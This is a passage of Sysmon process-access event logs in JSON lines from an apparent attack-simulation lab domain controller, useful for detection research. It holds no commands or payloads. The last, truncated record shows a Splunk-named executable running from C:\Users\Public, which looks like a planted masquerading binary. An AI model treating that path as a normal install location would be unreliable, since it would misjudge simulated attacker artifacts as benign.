stem32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2304,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2305,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2306,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2307,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2308,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2309,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.583\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1074-5F25-0000-00101A1F0400}\r\nTargetProcessId: 2564\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:24.583","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1074-5F25-0000-00101A1F0400}","TargetProcessId":"2564","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2310,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:24.760\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 